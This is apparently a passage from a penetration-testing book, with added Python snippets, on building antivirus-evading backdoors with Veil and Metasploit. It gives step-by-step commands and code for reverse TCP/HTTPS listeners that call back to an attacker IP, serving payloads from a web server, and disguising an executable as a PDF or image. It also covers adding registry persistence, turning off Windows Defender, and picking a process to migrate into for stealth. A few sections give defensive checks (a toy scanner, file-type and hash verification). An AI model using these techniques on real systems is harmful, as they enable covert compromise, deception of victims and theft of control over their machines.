

Veil-Evasion is a tool designed for penetration testers and red teams to
simulate bypasses of common antivirus products. Tools like this are of high
value to offensive security professionals, as they can be used to emulate a
more persistent attacker who will try to bypass an antivirus system through
trial and error. Without a tool such as Veil-Evasion, offensive security
engagements would take a longer time.
Veil-Evasion can work on existing executables, or simply create a wide range
of payloads with shellcode added to them. Most cases use a shellcode-based
method, as the resulting payload has a better chance of evading antivirus
systems.
Considering that a tool like this is used by professional organizations to
simulate an attack by adversaries, it would make sense to allow a user to
automate the generation of a payload from a central location. This allows it to
be integrated into attack workflows, which lets offensive security
professionals work more efficiently.
In summary:

Veil is a framework for generating backdoors that are not detected by
antivirus software.
A backdoor is a file that, when executed on a computer, will give
full access to that computer.
The Veil framework is located on GitHub.

The steps of a backdoor attack:

Create the backdoor file using Veil.
Check the file against antivirus software.
Listen for the connection using Metasploit.
Deliver and execute the file on the target machine.

6.2. Installing Veil 3.1 In Kali Linux


Exercise 28: Client-Side Attacks – Installing Veil Evasion
1. Go to the Veil page on GitHub: https://github.com/Veil-Framework/Veil
2. Copy the link from GitHub

3. Open a terminal in Kali

4. Go to the /opt directory and type:

# git clone https://github.com/Veil-Framework/Veil.git

5. Now go to the Veil directory

#cd Veil

6. Go to the config directory and run the setup file in silent mode (installing
the default configuration)

#./setup.sh --silent --force

7. After Veil is completely installed close the terminal, open a new
terminal and start Veil

#cd Downloads/Veil/Veil/
#./Veil.py

You can see the green commands that we can run in Veil.

8. Type

#list
Evasion: is the program which generates backdoors.
Ordnance: the program that generates the payload used by Evasion. The
payload is the part of the code that allows us to control the target machine, like
a reverse connection, or downloading or uploading files from/to the target machine.


Exercise 29: Creating Backdoor malware
1. To start using Evasion just type Veil>: use 1

2. The #list command will show us all the loaded payloads

Meterpreter is a dynamically extensible payload that uses in-memory DLL
injection and is extended over the network at runtime. Because this payload runs
only in memory, it allows us to do anything untraceably: no files are installed on
the target computer's hard disk, and we can use this payload to connect to other
target computers in the network and do anything the normal user can do on his
computer; it will give full control, like installing a keylogger inside the machine
and other malware, downloading files, running programs, etc.

3. Use Evasion payload 7, which is a reverse TCP connection:

Veil/Evasion>: use 7

4. Configure the payload by entering LHOST (the Kali machine IP
address) and, if you like to change the port, change the value of
LPORT.
5. Type: generate to generate the payload, then give a name to the
newly created Windows malware.
6. The file will be stored in /var/lib/veil/output/compiled/revtcp23.exe
7. This file is the malware that, when installed on a Windows 10 machine
and not detected by Windows Defender or other antivirus software,
will create a backdoor connection from the victim to the attacker
machine whose IP address was provided as part of the file creation
(Kali); the port is also configured because the attacker machine
needs to listen on that port in order to make the connection.

6.3. How Anti-Malware work


Anti-malware/antivirus programs scan for malware using a database of
known malware definitions (also called signatures). These definitions tell
what the malware does and how to recognize it. If the anti-malware program
detects a file that matches a definition, it will flag it as potential malware.
Heuristics
Another way anti-malware (AM) detects bad software is a form of analysis
called heuristics. An alternative to database scanning, heuristic analysis
allows anti-malware programs to detect threats that were not previously
discovered. Heuristics identifies malware by behaviors and characteristics,
instead of comparing against a list of known malware.
For example, if an application is programmed to remove important system
files, the anti-malware software may flag it as malware. Heuristic analysis
can sometimes result in "false positives", or legitimate programs flagged as
malware.
Sandboxing
A third way anti-malware software can find malware is by running a
program it suspects to be malicious in a sandbox, which is a protected space
on the computer, similar to a virtual machine within the OS. The suspected
program believes it has full access to the computer when, in fact, it is running
in an enclosed space while the anti-malware monitors its behavior. If it
demonstrates malicious behavior, the anti-malware will terminate it.
Otherwise, the program can execute outside the sandbox. However, some
forms of malware are smart enough to know when they are running in a
sandbox and will stay on their best behavior... until they are allowed free
access to the computer.
Removal
The anti-malware does not just flag malware. Once malware has been found
on a system, it needs to be removed. Many threats can be deleted by the anti-
malware program as soon as they are detected. However, some malware is
designed to cause further damage to the computer if it is removed. If the anti-
malware suspects this is the case, it will usually quarantine the file in a safe
area of computer storage. Basically, the anti-malware puts the malware in a
timeout. Quarantining a malicious file prevents it from causing harm and
allows you to remove the file manually without damaging your computer.
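The first two detection layers above, definitions and heuristics, can be shown in a few dozen lines. The following is an added example, not code from the book or from any antivirus product: a toy scanner that checks a file's hash and byte patterns against a definition list, then scores heuristic markers, and returns the evidence behind its verdict. The four "files" are constructed harmless byte strings; the marker list, weights and threshold are this example's choices. It also shows why a definition that is only a hash is brittle: the variant sample differs from the known one by a single padding byte, which is enough to miss the hash but not the pattern or the heuristics.

```python
import hashlib
from typing import Dict, List, Tuple

# --- constructed sample "files": harmless byte strings standing in for executables ---
CLEAN_FILE = b"MZ\x90\x00 constructed benign sample: prints hello world\x00"
KNOWN_BAD_FILE = b"MZ\x90\x00 constructed sample: cmd.exe /c del /q *.* CreateRemoteThread\x00"
VARIANT_FILE = KNOWN_BAD_FILE + b"\x00"  # one padding byte: same behaviour, different hash
STEALTHY_FILE = b"MZ\x90\x00 constructed sample: VirtualAllocEx WriteProcessMemory IsDebuggerPresent\x00"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Layer 1: definitions of known samples (an exact hash and a byte pattern).
HASH_SIGNATURES: Dict[str, str] = {sha256_hex(KNOWN_BAD_FILE): "Constructed.Wiper.A"}
PATTERN_SIGNATURES: List[Tuple[bytes, str]] = [
    (b"cmd.exe /c del /q *.*", "Constructed.Wiper.gen"),
]

# Layer 2: heuristic markers, each with a weight. These are characteristics
# behaviour-based engines commonly weigh; none is proof of malice on its own.
HEURISTIC_MARKERS: List[Tuple[bytes, int, str]] = [
    (b"CreateRemoteThread", 2, "starts a thread inside another process"),
    (b"WriteProcessMemory", 2, "writes into another process's memory"),
    (b"VirtualAllocEx", 1, "allocates memory in another process"),
    (b"IsDebuggerPresent", 1, "checks whether it is being analysed"),
]
HEURISTIC_THRESHOLD = 3


def scan(data: bytes) -> Dict:
    """Return the evidence each layer produced and the resulting verdict:
    'known-malware' (definition hit), 'suspicious' (heuristic score reached
    the threshold) or 'clean'."""
    digest = sha256_hex(data)
    result: Dict = {
        "sha256": digest,
        "hash_match": HASH_SIGNATURES.get(digest),
        "pattern_matches": [name for pat, name in PATTERN_SIGNATURES if pat in data],
        "heuristic_score": 0,
        "heuristic_reasons": [],
    }
    for marker, weight, why in HEURISTIC_MARKERS:
        if marker in data:
            result["heuristic_score"] += weight
            result["heuristic_reasons"].append(why)
    if result["hash_match"] or result["pattern_matches"]:
        result["verdict"] = "known-malware"
    elif result["heuristic_score"] >= HEURISTIC_THRESHOLD:
        result["verdict"] = "suspicious"
    else:
        result["verdict"] = "clean"
    return result


def verdicts() -> Dict[str, str]:
    """Scan the four constructed samples; name -> verdict."""
    samples = {"clean": CLEAN_FILE, "known_bad": KNOWN_BAD_FILE,
               "variant": VARIANT_FILE, "stealthy": STEALTHY_FILE}
    return {name: scan(data)["verdict"] for name, data in samples.items()}


if __name__ == "__main__":
    for name, verdict in verdicts().items():
        print(f"{name:10s} {verdict}")
```

The "stealthy" sample is the case the text's heuristics paragraph describes: nothing in the definition list matches it, yet the combination of cross-process memory writes and an anti-analysis check pushes its score over the threshold. A real engine would feed such a file to the sandbox layer next rather than block it on the score alone, which is also where the false positives the text mentions get weeded out.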
Checking if the generated file is detected by AV
There are websites that scan an uploaded file against many well-known anti-
malware engines at once. Some of these sites, VirusTotal for example, share
the uploaded file and its hash with the anti-malware vendors, so a backdoor
uploaded there will usually be detected by the vendors soon afterwards. The
free sites that do not share uploaded files tend not to stay online for long.
There are websites that review and rank these scanners and state whether a
scanner shares the uploaded file with antivirus vendors or not; search Google
for "Online Multi Engine Antivirus scanners".
These sites ask you to upload your file, scan it with every engine and show
you the result per engine.
6.4. Listening to incoming connections

Exercise 30: Setup Hacker machine to listen to incoming
connection
Since the backdoor that we created in the previous exercise uses a reverse
payload, we need to set up Kali to listen for the incoming connection using
the Metasploit framework, configured with the same payload type and port that
were used when the backdoor was generated.

1. Open a new terminal window in Kali and type

#msfconsole

2. Use the Metasploit module exploit/multi/handler, which lets us
receive the incoming connection from our payload file:

msf5> use exploit/multi/handler

3. Set the parameters of the handler (PAYLOAD, LHOST and LPORT) to the
values used when the Veil file was generated, as shown in the screenshot
below.

4. To start listening type

msf5> exploit

Notes

If you get the error "failed to bind to", either change the port in
the Veil file and repeat the listening steps in Kali, or use the
procedure below to see which process is using the port
(8080 in this exercise).

Use the following commands in Kali to determine which
process is using port 8080:

#netstat -a : shows all connections and listening sockets on the machine.

#lsof -i:<port number> : checks a specific port and shows which process
is using it.

You can then kill the process that is using port 8080, or pick a
different LPORT and regenerate the backdoor with it.
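The handler setup and the "failed to bind" note above, as an added Python example that is not part of the book: it checks that the chosen LPORT can actually be bound before writing a Metasploit resource script for exploit/multi/handler, which is the same condition msfconsole needs when it starts the listener. The payload name, addresses and file name are placeholders; the script is loaded with `msfconsole -r handler.rc`.

```python
import socket


def port_is_free(port: int, host: str = "0.0.0.0") -> bool:
    """Return True if a TCP listener could bind host:port right now.
    A False here is exactly the 'failed to bind' error the handler reports."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            s.bind((host, port))
            return True
        except OSError:
            return False


def handler_rc(payload: str, lhost: str, lport: int) -> str:
    """Build the msfconsole resource script for exploit/multi/handler.
    ExitOnSession false and exploit -j keep the listener up for more victims."""
    lines = [
        "use exploit/multi/handler",
        f"set PAYLOAD {payload}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "set ExitOnSession false",
        "exploit -j",
    ]
    return "\n".join(lines) + "\n"


def write_handler(path: str, payload: str, lhost: str, lport: int) -> str:
    """Refuse to write a handler whose port is already taken."""
    if not port_is_free(lport):
        raise RuntimeError(
            f"port {lport} is already in use; free it (lsof -i:{lport}) or "
            f"regenerate the backdoor with another LPORT")
    rc = handler_rc(payload, lhost, lport)
    with open(path, "w") as f:
        f.write(rc)
    return rc


def demo_port_conflict():
    """Occupy an ephemeral port ourselves, then show the check fails for it
    and still succeeds for a port nobody holds (port 0 = any free port)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as busy:
        busy.bind(("127.0.0.1", 0))
        busy.listen(1)
        taken = busy.getsockname()[1]
        return port_is_free(taken, "127.0.0.1"), port_is_free(0, "127.0.0.1")


if __name__ == "__main__":
    # Placeholder values: the payload, LHOST and LPORT must match the Veil file.
    print(write_handler("handler.rc", "windows/meterpreter/reverse_tcp",
                        "10.0.2.23", 8080))
```

Running the script on Kali and then `msfconsole -r handler.rc` replaces steps 1 to 4 above and fails early, with the lsof hint, instead of leaving you with a handler that silently never binds.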
6.5. Delivery Method

There are many ways to deliver the malware to victims' machines. The method
depends on the attacker's intention and on whether he is targeting specific
users or any user. The attacker chooses the delivery method after gathering
information about the victim and understanding how to exploit the victim
through social engineering and other means. The delivery method could be a
phishing email with a link to a malicious website or with the malware as an
attachment. For example, people looking for free software or a crack for a
software license are a target: the attacker can exploit their wish not to pay
for a license by offering the malware for download under the name of a crack,
and may even instruct users to disable their anti-malware software, claiming
that it would block the crack from working. Malware can also be delivered in
the form of a Word document or embedded in an image or a PDF file.

Exercise 31: Malware Basic Delivery Method

Basically, we are going to put the backdoor on the Kali web server and download
it from the target machine, just to make sure that the file works.

1. Copy the backdoor file to the Kali web server.
2. Go to the Kali web server folder located at /var/www/html and create a
new folder there to hold the malware files, so that they are available
to download.
3. Copy the Veil-generated file to that location:

#mkdir /var/www/html/maleware
#cp /var/lib/output/compiled/revtcp23.exe /var/www/html/maleware

4. If you already have an index.html file under the html folder, the new
folder under html keeps the Veil file separate from it.
5. Start the web server on Kali:

#service apache2 start

6. Start the Windows machine from VirtualBox, open a browser and connect
to the Kali website at http://Kali_ip/maleware
7. Click on the file revtcp23.exe and choose to run it anyway.
8. Windows Defender may detect the file and delete it; for testing
purposes disable Windows Defender.
9. Check Kali and you should see one session opened with the
Windows machine.
10. When you get a meterpreter session, that means the backdoor
successfully made a reverse connection to the Kali machine.
11. In the Kali meterpreter session type >sysinfo
12. Type >help to see the available commands and functions that you
can run on the victim machine.

Notes

I run the file manually on the Windows machine just to prove
that the file actually works.
Most likely the AV will detect the file and delete it or stop
it from working, so sometimes you may need to stop the
AV on the Windows machine just to make sure the file works.
Users whose AV is outdated will most likely not have the file detected.
To disable Windows Defender: go to Run, type
gpedit.msc and go to Administrative Templates →
Windows Components → Windows Defender
Antivirus and turn off Windows Defender Antivirus. On recent Windows 10
builds, Tamper Protection (Windows Security → Virus & threat protection
settings) may cause this policy to be ignored, so switch it off first.
Basically, bypassing antivirus programs or any other
security layer is a game of cat and mouse: backdoors
start getting detected at some stage, then the tool
developers release a new update that again allows you to
generate undetectable backdoors, then the AV vendors
release an update which makes the backdoors detectable again.
Make sure that Veil or any other tool you are using to
generate the backdoor is up to date.

Exercise 32: Creating Encrypted backdoor

An encrypted backdoor makes the communication between the victim
machine and the attack machine encrypted, so nobody watching the network
can see the content of the traffic uploaded to or downloaded from the victim
machine. The connection itself is still visible: the destination IP address,
the port and the TLS handshake can be seen and logged by the victim's network.
Veil can create an encrypted backdoor using a reverse_https connection, and
Metasploit on Kali uses the same reverse_https payload to listen and decrypt
the packets.

1. To create an encrypted backdoor:
2. Start Veil.
3. Use option 15, rev_https.
4. Set the options of rev_https.
5. The PROCESSORS and SLEEP parameters are sandbox checks: the payload
exits if the machine has fewer processors than PROCESSORS, and sleeps SLEEP
seconds before running, checking that the sleep was not accelerated. They do
not change what the backdoor does on a real machine, but they help with
antivirus evasion, both by defeating automated sandboxes and by changing the
file signature.
6. Copy the generated file to /var/www/html/maleware to make
the file available for download through the Kali website.
7. In Kali start the listener through msfconsole:

#msfconsole
msf5> use exploit/multi/handler
msf5> set PAYLOAD windows/meterpreter/reverse_https
msf5> set LHOST 10.0.2.23
msf5> set LPORT 4445
msf5> exploit

8. From the Windows 10 machine access the Kali website, download
the file revhttps.exe and choose to run it anyway when Windows gives
you a warning.
9. Look at the Kali listener: you can see the reverse connection is
established and uses HTTPS, which means the connection is encrypted.
10. In the meterpreter session type meterpreter>shell to get a Windows
shell.

6.6. Control hacked Devices with Kage Tool

Kage is a GUI front end for the Metasploit RPC server that interacts with
Meterpreter sessions and generates payloads for Windows
Meterpreter and Android Meterpreter. Kage makes Metasploit setup easier
through GUI configuration for creating backdoor malware, setting up the
Metasploit listener and many other Metasploit functions.

Exercise 33: Using Metasploit GUI Kage

1. In Kali open the browser and go to https://github.com/Zerx0r/kage
2. Download Kage by clicking on "you can install Kage binaries from
here" on the same page.
3. Then download the Linux version, Kage.0.1.1-beta_linux.AppImage
4. Navigate to the downloaded file from a Kali terminal.
5. Make the file executable and run it from the terminal:

#chmod +x Kage.0.1.1-beta_linux.AppImage
#./Kage.0.1.1-beta_linux.AppImage &

6. Manually start Metasploit from a terminal, then load msgrpc:

#msfconsole
msf5> load msgrpc

7. Copy the password printed by msgrpc, then go to Kage, enter
the username msf and the password, uncheck "over https"
and click Connect.
8. After clicking Connect, the following window will appear.
9. Creating a backdoor with Kage is easy.
10. Go to the folder Kage under /root and rename the file to .exe
11. Create a listener using Kage.
12. Copy the backdoor to /var/www/html/maleware
13. Start the Windows machine, go to the Kali website, download
the kagetest.exe backdoor and run it anyway.
14. Go back to Kali, open Kage and click on Sessions.
15. Click on Interact, then click on the Screenshot button.

Notes

Kage is still new software at the time of writing this book
(beta); some features like the camera stream or the
microphone are not working. However, it is very useful
software, allowing easy management of sessions and control of
hacked machines.
Kage can list and control sessions created manually, for example by
a direct msfvenom command or by Veil backdoors.
Normally backdoors generated through msfvenom are easily
detected by antivirus programs.
You can also interact with a Kage session manually from the terminal by
listing the sessions in msfconsole.

6.7. Embedding Malware into PDF and JPG files

Malware can be embedded in a PDF in two ways. One is to use a PDF reader
vulnerability, if one exists, together with an exploit for it;
Metasploit has exploits for old PDF reader vulnerabilities that
work on Windows XP with Adobe Reader 9. These do not work on
Windows 8 and up with the latest Adobe Reader. The other way does not
depend on a vulnerability in Adobe Reader or in the PDF format itself; rather
it combines the malware file with a PDF file and gives the result the look of
a PDF file. The hacker depends on deceiving the victim into running the
combined file, thinking that he is opening a PDF. When the combined file runs,
the PDF opens on the victim's desktop as normal, but at the same time the
malware starts and creates a backdoor to the hacker machine. Similarly, we can
replace the PDF file with a JPG image file and combine it with the malware.
Exercise 34 Embedding Malware into PDF file
1. Use the same malware file that we created in the previous exercises or
generate a new file.
2. We are going to use the Windows machine to do the file joining (PDF +
malware).
3. Start the Windows 10 virtual machine.
4. Use the malware file we used in the Kage exercise (kagetest.exe).
5. Move the file to the Windows desktop.
6. Download an Adobe PDF icon image from the internet.
7. Create an .ico file from the PDF icon image (.ico is the Windows icon
format).
8. Go to https://icoconvert.com (or any other ico converter website).
9. Convert to ICO and download it to the desktop.
10. Have a real PDF file that will be used to hide the malware.
11. On the Windows desktop, you should have the following files.
12. Highlight the malware and the PDF file and add them to an archive
(WinRAR).
13. Give the archive a name, choose "Create SFX archive" and click
on Advanced.
14. Click on SFX options -> Update and choose "Extract and update
files" and "Overwrite all files" (see screenshot).
15. Then click on the Setup tab and add the malware name ending with .exe,
followed by the PDF file name ending with .pdf, one per line; both are run
after extraction.
16. Click on Modes and select "Hide start dialog".
17. Then click on the Text and icon tab; at the bottom, load the SFX icon
from file and choose the ico file that we created.
18. OK, then OK, and the final file will be generated.

The final file is a self-extracting .exe that carries the PDF icon; with
"hide extensions for known file types" enabled, Explorer shows it simply as
COVID19.pdf. When it is opened, the PDF is displayed and the malware is
automatically started and makes a reverse connection to the Kali machine.

19. In Kali we are going to set up msfconsole (Metasploit) to listen for
the incoming connection from the victim machine that opens the PDF
file. We are also going to set msfconsole to run a persistence module on
the victim machine after the first connection is established. The module
changes a Windows registry setting to make the malware independent of the
PDF file, so that it starts automatically when the Windows machine is
rebooted.

#msfconsole

Load msgrpc (to use Kage as the session GUI controller):

msf5> load msgrpc
msf5> use exploit/multi/handler
msf5> set PAYLOAD windows/meterpreter/reverse_tcp
msf5> set LHOST 10.0.2.23
msf5> set LPORT 4444
msf5> set ExitOnSession false
msf5> set AutoRunScript exploit/windows/local/persistence LPORT=4444
(this option makes the malware persistent on the victim)
msf5> exploit -j

20. Go to the Windows machine and open the PDF file; the reverse
connection to Kali will start.

msf5> sessions
msf5> sessions 1

21. Start Kage and set up a job to interact with the session.
22. Go back to Windows and close the PDF file; notice that the session
does not close.
23. Reboot the Windows machine and monitor Kali msfconsole for new
sessions (to check that the persistence module works).
24. Type

msf5> sessions
msf5> sessions 3

25. In Kage remove the old session and create a new one, because the
session number changes after the reboot.
26. To clean up the Windows 10 machine from the persistence mode,
delete the VBS script located under
C:\Users\Administrator\AppData\Local\Temp, or use the cleanup resource
script that the persistence module generates:

meterpreter> resource <<location of clean up script>>


Exercise 35 Embedding Malware inside image file

The same procedure used to embed malware in a PDF file can be used to
embed malware in an image.

1. Go through exercise 34, just replacing the PDF file with an image (JPG).
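Both exercises rely on the victim trusting the icon and the visible name. An added check for the receiving side (Python, not from the book): compare the type a file's extension claims with its real type from the first bytes, flag a double extension such as COVID19.pdf.exe, and look for the RAR signature that a WinRAR self-extracting archive carries behind its executable stub. The four sample files are short constructed byte strings, not real binaries.

```python
# Leading bytes ("magic numbers") of the formats we care about.
MAGIC = {
    "pdf": b"%PDF-",
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "exe": b"MZ",            # Windows PE executable (also SFX archives)
}
# What a file extension claims the content to be.
EXT_TYPE = {"pdf": "pdf", "jpg": "jpg", "jpeg": "jpg", "png": "png",
            "exe": "exe", "scr": "exe", "com": "exe"}
# A WinRAR SFX is a PE stub followed by the RAR archive; this is its marker.
RAR_MARK = b"Rar!\x1a\x07"


def content_type(data: bytes) -> str:
    for kind, magic in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def check_download(name: str, data: bytes) -> list:
    """Return a list of findings for a downloaded file; an empty list means
    the name and the content agree and nothing looks like an SFX."""
    findings = []
    exts = name.lower().split(".")[1:]
    actual = content_type(data)
    claimed = EXT_TYPE.get(exts[-1]) if exts else None
    # 1. report.pdf.exe: Explorer hides the last extension by default.
    if len(exts) >= 2 and exts[-2] in EXT_TYPE and exts[-1] in EXT_TYPE:
        findings.append(f"double extension .{exts[-2]}.{exts[-1]} "
                        f"(Explorer may show only .{exts[-2]})")
    # 2. The extension says one thing, the bytes say another (renamed .exe).
    if claimed and claimed != actual:
        findings.append(f"extension claims {claimed} but content starts like {actual}")
    # 3. An executable carrying a RAR archive is a self-extracting bundle.
    if actual == "exe" and RAR_MARK in data:
        findings.append("executable with embedded RAR data (self-extracting archive)")
    return findings


# Constructed samples: minimal headers only, none of these is a working file.
SAMPLES = {
    "COVID19.pdf.exe": (b"MZ\x90\x00" + b"\x00" * 60
                        + b"This program cannot be run in DOS mode"
                        + b"Rar!\x1a\x07\x00" + b"\x00" * 8),
    "invoice.pdf": b"MZ\x90\x00" + b"\x00" * 60,          # plain renamed .exe
    "report.pdf": b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n1 0 obj\n",
    "photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",
}

if __name__ == "__main__":
    for fname, blob in SAMPLES.items():
        print(fname, check_download(fname, blob) or ["ok"])
```

On a real download, read only the first few kilobytes for the magic check but scan the whole file for the RAR marker, since the archive sits after the SFX stub. The same idea applies to the JPG variant of exercise 35: a genuine JPEG starts with FF D8 FF, never with MZ.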

6.8. Protecting against smart delivery methods

There are three ways to protect against smart backdoor delivery methods.
First, block or prevent man-in-the-middle attacks by using trusted networks, a
VPN client, or a tool such as XArp on your systems; XArp detects ARP
poisoning, and the free version can be downloaded from
http://www.xarp.net/#download
Second, only use HTTPS connections to websites: they are encrypted, so the
downloaded file cannot be patched on the fly by someone in the middle.
Third, use hashing. A file hash is a signature that proves the file you
downloaded to your machine is the same file the publisher has on his website
and was not changed on the way; publishers normally have the file hash
published on their website beside the file name to be downloaded.
When you download a file, and before running it on your machine, generate the
file hash and compare it to the hash published on the owner's website. If the
two values are identical the file is safe and was not changed on the way; if
they do not match, the file is not safe. Generating the hash can be done from
the command line (sha256sum in Kali, certutil -hashfile in Windows) or with a
GUI tool available on the internet.
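The hash check described above, as an added Python example that is not the book's own code: it computes SHA-256 in chunks, parses a SHA256SUMS-style list (the format that `sha256sum -c` reads) and compares digests with hmac.compare_digest. The file contents, file names and the published list are constructed inline for the demonstration.

```python
import hashlib
import hmac


def sha256_of(data: bytes) -> str:
    """Hex SHA-256, fed in chunks so a large download need not fit in memory."""
    h = hashlib.sha256()
    for i in range(0, len(data), 65536):
        h.update(data[i:i + 65536])
    return h.hexdigest()


def parse_sums(text: str) -> dict:
    """Parse '<hex>  <filename>' lines as written by sha256sum; '*' before the
    name marks binary mode and is ignored, '#' lines are comments."""
    table = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition("  ")
        name = name.lstrip("*")
        if len(digest) == 64 and name:
            table[name] = digest.lower()
    return table


def verify(name: str, data: bytes, published: dict) -> bool:
    """True only if the file is listed and its digest matches exactly.
    An unlisted file is a failure, not 'nothing to check'."""
    expected = published.get(name)
    if expected is None:
        return False
    return hmac.compare_digest(sha256_of(data), expected)


# Constructed download and the list the publisher would have posted beside it.
ORIGINAL = b"MZ\x90\x00" + bytes(range(256)) * 4 + b"tool-1.0 release build"
TAMPERED = ORIGINAL + b"\x00"          # one extra byte patched in on the way
PUBLISHED_SUMS = (
    "# SHA256SUMS for tool 1.0\n"
    f"{sha256_of(ORIGINAL)}  tool-1.0.exe\n"
    f"{sha256_of(b'readme')}  *README.txt\n"
)

if __name__ == "__main__":
    sums = parse_sums(PUBLISHED_SUMS)
    print("original:", verify("tool-1.0.exe", ORIGINAL, sums))
    print("tampered:", verify("tool-1.0.exe", TAMPERED, sums))
```

Two details matter in practice: the published list must be fetched over HTTPS from the publisher's own site (a hash served next to a patched file by the same man in the middle proves nothing), and the comparison uses compare_digest so that a partially matching digest is not rejected measurably faster than a completely wrong one.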
7
Post
Exploitation

As the term suggests, post exploitation basically means the phases
of operation once a victim's system has been compromised by the
attacker. The value of the compromised system is determined by
the value of the actual data stored in it and how an attacker may
make use of it for malicious purposes. This phase deals with
collecting sensitive information, documenting it, and having an
idea of the configuration settings, network interfaces, and other
communication channels. These may be used to maintain persistent
access to the system as per the attacker's needs.

7. Post exploitation
Post exploitation is what happens after the attacker gains access to the victim
computer using a backdoor program or another method: he will try to take full
control of the victim PC by reading, copying, writing or deleting files and
operating PC peripherals like the camera, microphone, etc. In this section we
have an exercise that creates a backdoor file using Veil and then uses the
Metasploit console to listen for the connection request coming from the
backdoor file once it is delivered to the victim PC. For testing purposes we
are going to use the same file created in exercise 32 and the same basic
delivery method, which was through the Kali website.
7.1. Metasploit meterpreter commands
Exercise 36: Post Exploitation
1. Start the Kali machine.
2. Check the port used in the backdoor file created by Veil in
exercise 32.
3. In Kali start the apache2 web server:

#service apache2 start

4. Set up Kali to listen for the connection (msfconsole, exploit/multi/handler,
and the same PAYLOAD, LHOST and LPORT as in exercise 32).
5. Start the Windows machine.
6. Access the Kali website that contains the backdoor file from exercise
32.
7. In Windows run the file downloaded from the Kali website.
8. Looking at the Kali listener you will see the connection established and
you have a meterpreter session.
9. To see all possible commands that we can run in the victim machine,
run:

meterpreter> help
meterpreter> background

10. The background command puts the meterpreter session in the
background and returns you to the msf prompt; the backdoor keeps running.

msf5> sessions

shows the currently running sessions.

11. To interact with a session again, type

msf5> sessions 1 (to connect back to session 1)

12. meterpreter> ipconfig (shows the Windows network
configuration)

7.2. Process impersonation

Metasploit meterpreter can migrate the backdoor from its own process into
another running Windows process, so that it continues running under that
process's ID. This makes the malware less conspicuous when someone looks at
the list of running Windows processes.
meterpreter>ps
The ps command lists all running processes on the target computer.

As we can see, the Microsoft Edge process ID is 816.

meterpreter>migrate 816
The migrate command moves the backdoor into MicrosoftEdgeCP.exe, process
number 816, which is the process ID for Edge, to be less suspicious on the
victim machine.

Notes

You can migrate to any process in Windows that runs as the
same user; migrating into another user's process needs higher
privileges. Edge is always in use and looks innocent, but its
content processes (MicrosoftEdgeCP.exe) run in an AppContainer
sandbox at low integrity and are closed when the browser closes,
so a long-lived process running as the same user, such as
explorer.exe, is the more reliable home for a session that must
survive. Match the process architecture (x86/x64) to the session.
If you look at Windows Resource Monitor under
Network, you can see the exploit process using
explorer to connect to the Kali machine.
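Choosing a migration target from the ps listing, as an added Python example (not the book's code): it parses the columns that meterpreter's ps prints, keeps processes of the same architecture and user as the session, skips sandboxed browser content processes and protected system processes, and prefers explorer.exe. The listing, PIDs, user name and the session's own PID are constructed for the example.

```python
import re

# Constructed meterpreter 'ps' output (columns: PID PPID Name Arch Session User Path).
PS_OUTPUT = r"""
Process List
============

 PID   PPID  Name                  Arch  Session  User                 Path
 ---   ----  ----                  ----  -------  ----                 ----
 0     0     [System Process]
 4     0     System
 616   528   lsass.exe             x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\lsass.exe
 724   616   svchost.exe           x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 816   724   MicrosoftEdgeCP.exe   x64   1        DESKTOP-1\user       C:\Windows\SystemApps\MicrosoftEdgeCP.exe
 2540  2488  explorer.exe          x64   1        DESKTOP-1\user       C:\Windows\explorer.exe
 3312  2540  notepad.exe           x86   1        DESKTOP-1\user       C:\Windows\SysWOW64\notepad.exe
 3980  2540  revtcp23.exe          x64   1        DESKTOP-1\user       C:\Users\user\Downloads\revtcp23.exe
"""

# Rows without an Arch column (kernel pseudo-processes) are not migration targets.
ROW = re.compile(r"^\s*(\d+)\s+(\d+)\s+(\S.*?)\s{2,}(x86|x64)\s+(\d+)\s+(\S.*?)"
                 r"(?:\s{2,}(\S.*))?\s*$")

# Sandboxed or short-lived browser processes, and protected system processes.
AVOID = {"microsoftedgecp.exe", "microsoftedge.exe", "chrome.exe", "firefox.exe",
         "iexplore.exe", "lsass.exe", "csrss.exe", "smss.exe", "wininit.exe",
         "services.exe"}
# Long-lived processes, in order of preference.
PREFERRED = ["explorer.exe", "svchost.exe", "runtimebroker.exe", "sihost.exe"]


def parse_ps(text: str) -> list:
    procs = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            procs.append({"pid": int(m.group(1)), "ppid": int(m.group(2)),
                          "name": m.group(3), "arch": m.group(4),
                          "session": int(m.group(5)), "user": m.group(6),
                          "path": m.group(7) or ""})
    return procs


def candidates(procs: list, session_arch: str, session_user: str, own_pid: int) -> list:
    """Same architecture, same user, not on the avoid list, not ourselves;
    preferred names first, then oldest (lowest PID) first."""
    out = [p for p in procs
           if p["arch"] == session_arch
           and p["user"].lower() == session_user.lower()
           and p["name"].lower() not in AVOID
           and p["pid"] != own_pid]

    def rank(p):
        n = p["name"].lower()
        return (PREFERRED.index(n) if n in PREFERRED else len(PREFERRED), p["pid"])

    return sorted(out, key=rank)


def pick_target(ps_text: str, session_arch: str, session_user: str, own_pid: int):
    """PID to pass to 'migrate', or None if nothing suitable is running."""
    c = candidates(parse_ps(ps_text), session_arch, session_user, own_pid)
    return c[0]["pid"] if c else None


if __name__ == "__main__":
    print(pick_target(PS_OUTPUT, "x64", r"DESKTOP-1\user", own_pid=3980))
```

With the constructed listing the choice is explorer.exe (PID 2540) rather than the Edge content process 816: same user, same architecture, and it outlives the browser. For an x86 session only notepad.exe qualifies, and a SYSTEM session would land in svchost.exe, since lsass.exe is on the avoid list.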
7.3. Controlling Victim file system

After connecting to the victim machine through Metasploit msfconsole,
meterpreter allows full control of the machine's file system: you should be
able to browse all files and directories, download, upload, delete and write
files, and run new processes.
Exercise 37: Controlling victim file system
1. Meterpreter allows us to control the victim machine and navigate
through its files and directories; we can also download from and upload to
the machine.
2. Here is a list of file system commands that I can run in the victim
machine (meterpreter> help lists them under "Stdapi: File system
